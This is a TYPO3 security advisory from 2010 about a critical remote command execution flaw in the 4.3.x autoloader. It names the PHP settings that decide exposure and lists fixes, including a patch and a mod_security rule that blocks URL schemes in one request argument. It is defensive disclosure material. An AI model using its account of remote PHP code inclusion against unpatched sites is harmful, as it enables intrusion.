TYPO3-SA-2010-008: Vulnerability in TYPO3 Core

Categories: TYPO3 CMS Created by Marcus Krause
It has been discovered that TYPO3 Core is vulnerable to Remote Command Execution.

Component Type: TYPO3 Core

Affected Versions: 4.3.0, 4.3.1 and 4.3.2 (+ development releases of 4.4 branch)

Vulnerability Types: Remote Command Execution

Overall Severity: Critical

Release Date: April 9, 2010

Vulnerable subcomponent: TYPO3 autoloader

Vulnerability Type: Remote Command Execution

Severity: Critical

Suggested CVSS v2.0: AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C (What's that?)

Problem Description: The TYPO3 autoloader does not validate passed arguments.

You are not vulnerable if at least one of following conditions is met:

  1. You are using any other TYPO3 version than 4.3.0, 4.3.1 or 4.3.2 (+ development releases of 4.4 branch).
  2. You have at least one of following PHP configuration variables set to "off": register_globals ("off" by default, advised to be "off" in <media>TYPO3 Security Cookbook</media>), allow_url_include ("off" by default) and allow_url_fopen ("on" by default)
  3. You are using Suhosin and haven't put URL schemes in configuration variable "suhosin.executor.include.whitelist".

Possible Impact: A crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external server and to execute it on the TYPO3 installation.

Solution: You can choose one of the solutions below:

  1. Update to the TYPO3 version 4.3.3 that fix the problem described!
  2. Set at least one of following PHP configuration variables to "off": register_globals, allow_url_include and allow_url_fopen
  3. Apply the patch that is linked below!
  4. Replace all files that are part of the security fix by using the zip archive that is linked below!
  5. Set up a mod_security rule:
    SecRule  ARGS:error  "^(https?|ftp)"  "deny"

Patch: how to patch

  1. Patch for TYPO3 version 4.3.x (md5 sum: 19fec0afa12e91152811d9c6e9c73cf1)

Files: Extract the archive and replace server files with those that are in the archive

  1. Archive containing safe to use files (md5 sum: fb5e62007c20f8a03b06d1acab1f4c8e)

Note: We have been informed that this vulnerability has already been exploited.

Credits: Credits go to Christian Bülter and Bastian Heiser who discovered and reported the issue and the Security Team members Dmitry Dulepov, Marcus Krause and Helmut Hummel for providing the mod_security rule and the patch.

General Advice: Follow the recommendations that are given in the TYPO3 Security Cookbook. Please subscribe to the typo3-announce mailing list.